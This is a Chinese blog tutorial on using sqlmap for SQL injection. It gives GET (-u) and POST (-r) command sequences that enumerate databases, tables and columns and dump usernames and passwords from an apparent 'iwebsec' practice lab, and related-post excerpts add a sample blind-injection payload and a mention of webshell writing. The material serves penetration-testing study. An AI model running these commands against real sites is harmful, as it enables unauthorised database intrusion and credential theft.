sql注入之sqlmap使用

原创 已于 2024-07-23 19:22:03 修改 · 3.8k 阅读 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
cknow-ai 子沐,行!

cknow-ai 关注

标签
#sql #spring #安全
分类 操作系统
于 2023-03-23 19:47:14 首次发布
本文介绍了sqlmap的使用方法,包括通过get和post方式执行SQL注入,列举数据库、表和字段,以及数据导出的命令行参数,如`-u`用于指定URL,`--dbs`列举数据库,`--tables`列举表,`--columns`显示字段,`--dump`导出数据。

1.打开sqlmap

2.使用

(1)get注入

python sqlmap.py -u "指定注入点的URL"

#其中“-u”参数用于指定注入点的URL

python sqlmap.py -u "指定注入点的URL" --dbs

#,其中参数“--dbs”用于列举数据库。

python sqlmap.py -u "指定注入点的URL" -D iwebsec --tables

#其中参数“-D”用于指定数据库名称,“--tables”参数用于列举表。

python sqlmap.py -u "指定注入点的URL" -D iwebsec -T user --columns

#其中参数“-T”用于指定表名称,“--columns”参数用于指定列出表中字段。

python sqlmap.py -u "指定注入点的URL" -D iwebsec -T user -C id,password,username --dump

#其中参数“-C”用于指定字段名称,参数“--dump”用于导出数据

-----------------------------------------------------

(2)post注入

(注:此时将数据包存在了桌面上命名为123.txt)

python sqlmap.py -r C:\Users\caicq\Desktop\123.txt

#其中“-r”参数用于指定注入点的导出流量包的绝对路经文件

python sqlmap.py -r C:\Users\caicq\Desktop\123.txt --dbs

#,其中参数“--dbs”用于列举数据库。

python sqlmap.py -r 123.txt -D iwebsec --tables

#其中参数“-D”用于指定数据库名称,“--tables”参数用于列举表。

python sqlmap.py -r 123.txt -D iwebsec -T user --columns

#其中参数“-T”用于指定表名称,“--columns”参数用于指定列出表中字段。

python sqlmap.py -r 123.txt -D iwebsec -T user -C id,password,username --dump

#其中参数“-C”用于指定字段名称,参数“—dump”用于导出数据

🍬 博主介绍
👨‍🎓 博主介绍:大家好,我是 子沐 ,很高兴认识大家~
✨主攻领域:【应急响应】 【edusrc漏洞挖掘】 【面试分析】【网络与设备相关操作】
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋

🍬 博主资源
🎉需要如下资料和培训的可加微信和知识星球(前50名为邀请嘉宾) 知识星球号:9081196🎉
1、全国职业技能大赛——信息安全管理与评估WP+环境
2、全国职业技能大赛——司法技术赛项WP+环境
3、CTF最新资料+相关工具(圈子交流)
4、SRC漏洞挖掘的大量原创报告

点赞 点赞 1
评论 0
书签 书签 5
[网络安全提高篇] 一〇六.SQL注入之手工注入SQLMAP入门案例详解
杨秀璋的专栏
03-26 1万+
前文带领大家Oracle数据库注入漏洞和致命问题,包括各种类型的注入知识。这篇文章将详细介绍SQL注入知识,结合案例对比手工SQL注入SQLMAP的基本用法,案例和基础原理的结合能加深大家对SQL注入的理解。希望这篇文章对您有帮助,更希望帮助更多安全或红蓝对抗的初学者,也推荐大家去使用Cyberbit Range的靶场,且看且珍惜。
kali之使用sqlmap进行sql注入
weixin_34284188的博客
06-14 2831
sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆...
sql注入知识----sqlmap常用参数
尘玥的故事
01-23 1753
在知道注入点在哪里时通过' * '进行测试 工具会识别' * '并在这里测试数据库常用 urrent-db //查看当前的数据库passwords //查看所有密码batch 按照软件默认设置,自动回答start x1 --stop x2 输出从x1到x2的啥啥啥参数:–answers参数:--threads-dbs 列出所有数据库current-db 获取当前数据库名称tables -D “ ” 获取指定数据库中的表 columns -T “4” -D “3”获取数据库3中的4表的所有字段(列名
【网络安全学习】SQL注入02:使用sqlmap进行注入
Zane的博客
08-06 1026
sqlmap的基础使用方法
使用sqlmap工具进行sql注入
最新发布
2301_80414976的博客
04-09 446
前 8 关 (GET): “我看到 URL 有参数,直接开干!” (默认行为)-14 关 (POST): “你给我一个包,我把包里的数据拿出来测。” (使用 -r)-16 关 (Blind): “这里没回显,我得用时间延迟和逻辑判断来慢慢校验,请给我加 --level。-17 关 (特定位置): “注入点不在常规位置(在密码框或头部),请给我加 -p 指定参数名。
SQL注入Sqlmap使用指南(手把手保姆版)持续更新
开水的博客
03-15 6万+
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。python sqlmap.py -参数sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
sqlmapsql注入(一)
m0_55313512的博客
02-27 6026
SQL注入(一)
sqlmap学习(八)指定位置注入
rane的博客
03-26 2万+
1、sqlmap设置指定注入参数 -p:指定参数进行扫描,不是扫描所有参数,这样可以避免浪费时间到非注入参数上,从而提高扫描效率。 python sqlmap.py -u "url" -p "id,user-agent" --skip跳过指定参数扫描,和-p作用相反,它用来跳过需要扫描的参数。 python sqlmap.py -u "url" --skip "id,user-agent" ...
SQL注入(DVWA靶场搭建及使用sqlMap注入sqlmap问题及解决办法)
tmzy1的博客
03-19 7558
SQL注入(DVWA靶场搭建及使用sqlMap注入sqlmap问题及解决办法)
SQL注入SQLmap简单用法,和SQL注入写入一句话木马
m0_56214376的博客
03-16 9709
SQL注入 Boolean注入攻击-布尔盲注 1' and length(database())>1 -- qwe 1’ and length(database())>10 # mysql数据库中的字符串函数 substr()函数和hibernate的substr()参数都一样,但含义有所不同。 用法: substr(string string,num start,num length); string为字符串; start为起始位置; length为长度。 1’ and ascii(s
sql注入原理及各姿势sqlmap使用
2401_84281748的博客
05-17 950
三、判断数据显示点?id=-1’ union select 1,2,3 --+ //可以把注入点改为负数或零达到注释前半段语句的效果四、显示用户和数据库名五、查看所有表六、查看表里的所有列七、查看字段值。
SQLMAP注入参数-其他参数介绍
分享学习网络的点点滴滴
08-15 1406
指定扫描的参数,使–level失效1-5级(默认1)/usr/share/sqlmap/xml/payloads 查看不同级别下发送不同的payload。
SQL注入--Sqlmap使用
qq_37107430的博客
12-12 1534
Sqlmap是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。
SQLmap参数详解
Williamanddog的博客
01-19 6322
目标URL参数:-u或者--url 格式:http(s)://targeturl[:port]/[…] 例如:python sqlmap.py -u "从Burp或者WebScarab代理中获取日志 参数:-l 可以直接吧Burp proxy或者WebScarab proxy中的日志直接导出来交给sqlmap来一个一个检测是否有 注入。 从文本中获取多个目标扫描 参数:-m 文件中保存url,sqlmap会一个一个检测 从文件中加载HTTP请求 参数:-r。
使用SQLmap进行注入流程
weixin_62715196的博客
08-10 4993
主要讲述SQLmap的主要功能以及对单个目标如何进行注入
SQL注入-sqlmap常用参数
qq_46395138的博客
04-07 1321
不想用--data指定参数,-r可以读取一个数据包(burp)的内容,对数据包进行一个sql注入的测试。level1:只检测你提交的数据,升高level,会检测cookie,refer,请求头里的数据。如果里面有一些简单的加密(MD5),会自动进行撞库操作(↑data注入的流程)“data 注入”(这里更准确地说是基于 POST 数据的 SQL 注入)数据包的内容整个粘到423.txt,拉入,或写路径,直接回车。账号,密码,登录的地方跟数据库有交互。标记注入点(指定注入参数。-p指定哪个参数注入点。
sqlmap新手教程
weixin_66717977的博客
06-30 4288
sqlmap
利用sqlmap进行POST注入
热门推荐
lwpoor123的博客
12-24 13万+
利用sqlmap进行POST注入,常见的有三种方法: 注入方式一: 1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下 2.列数据库: sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs 注:-r表示加载一个文件,-p指定参数 其中出现了三次提示: it looks l...
SQL注入详解(包含SQLMap用法)
Zyu0
12-07 4935
这个系列讲的是整个SQL注入流程,其中包含各种手工注入姿势、SQLmap自动化注入安全防护绕过姿势详解,现在只完成了其中一部分内容,每天都会更新,感兴趣的可以持续关注一下~
SQL 注入神器:SQLMap 参数详解
Flag少侠的博客
05-01 4039
这些选项可用于创建自定义用户定义函数--udf-inject 注入自定义用户定义函数--shared-lib=SHLIB 共享库的本地路径。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值